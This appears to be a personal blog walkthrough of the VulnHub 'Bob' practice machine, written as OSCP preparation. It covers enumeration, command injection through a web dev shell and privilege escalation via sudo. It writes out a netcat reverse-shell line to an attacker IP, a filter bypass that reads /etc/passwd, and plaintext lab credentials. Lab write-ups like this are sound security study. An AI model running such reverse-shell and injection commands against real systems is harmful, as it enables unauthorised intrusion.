Bob machine — Walkthrough
Hi guys, this is the fifth day and fifth box (5D-5B for my personal reference). I will be trying to complete at least one box per day (if could two or more) so I could gain my confidence, learn new knowledge, and prepare for OSCP.
Wish me luck!
So, today I would like to work on Bob machine, which is from VulnHub. Let’s get started!
################################################################ — — — — — — — — — Please read to the end! Thank you! — — — — — — — — —
###############################################################
Enumeration
Nmap
It looks like there is only 2 ports opened. Also, we can see there is a few disallowed entries.
/lat_memo.html
Hmmm, good job IT Bob.
/passwords.html
Good one, Bob. Don’t mad, Bob.
/login.php
/dev_shell.php
Looks like we have a playground here. Lets try some commands.
It seems it works a little bit. But not all…
Then, I look at the source using Inspect. Soon Bob, soon.
Then I tried encode it first, and it works!
base64 < ../../../etc/passwd | base64 -d
It does take me sometime (1 hour?) to find the possible code to exploit it.
echo && nc <Attacker_IP> 1337 -e /bin/bashAnd we will get our shell.
Gobuster
Nothing really useful here.
80 — HTTP
Plain. Simple. Nothing.
Foothold then?
Now we will try to look for anything we can use on this machine. But first, we can upgrade the shell first.
python -c ‘import pty; pty.spawn(“/bin/bash”)’
.hint file
It is a hidden file, which named “hint”, of course I am interested. Thanks Bob.
.old_passwordfile.html
Changing directory to bob, I saw this file that would possibly have a password we can use later on.
And we get the password.
Documents
Here we have, secret, logins and staff note. Lets view it.
staff.txt
Looks like staff not good with each others. Normal case.
Secret folder
I personally would think this is a “trap” to waste my time. But after a few times of changing directory, I found a notes.sh! I am a bit excited when I saw it as it looks like a name when the First letters are combined. HARPOCRATES
login.txt.gpg
It shows unreadable text when it wanted it to show. Maybe we can use some tools to read it?
The User Elliot
When looking into Elliot’s folder, I saw a file named “theadminisdumb.txt”.
Woah, it have passwords again! Qwerty and theadminisdumb.
So, now we have the follows:
Bob:theadminisdumb
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
jc:Qwerty
Elliot: ?
SSH to Seb
Now we try to ssh into one of the user, Sebastian using the credentials we had.
Then, use the passphrase found previously and use it as passphrase. By cracking it, we can get the password.
gpg — batch — passphrase HARPOCRATES -d login.txt.gpg
bobbob:b0bcat_
SSH to Bob
Now using the credentials, we can ssh to Bob.
Try to check the permission.
It looks like we can straight away run sudo su to get into admin.
and the FLAGGGGGGGG~
Voila! Another room done!
Thank you for reading my write-up. I would like to improve my write-up skills in the future and can reach me through Twitter or comments. Any sponsors also welcomed.
Twitter: https://twitter.com/curse_jk
Buy me coffee:http://buymeacoffee.com/Cursemagic
Other medium write-ups: https://cursemagic.medium.com
